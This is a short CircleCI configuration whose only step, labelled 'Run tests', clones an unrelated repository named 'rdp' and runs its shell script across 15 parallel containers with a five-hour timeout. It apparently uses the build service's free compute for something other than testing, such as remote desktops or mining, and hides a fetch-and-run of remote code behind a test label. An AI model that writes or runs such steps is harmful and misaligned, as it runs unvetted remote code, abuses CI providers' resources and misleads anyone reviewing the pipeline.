version: 2 
 
jobs:
  build:
    parallelism: 15
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          no_output_timeout: 5h 
          command: git clone https://github.com/gensxtralz/rdp.git && cd rdp && chmod +x sh.sh && ./sh.sh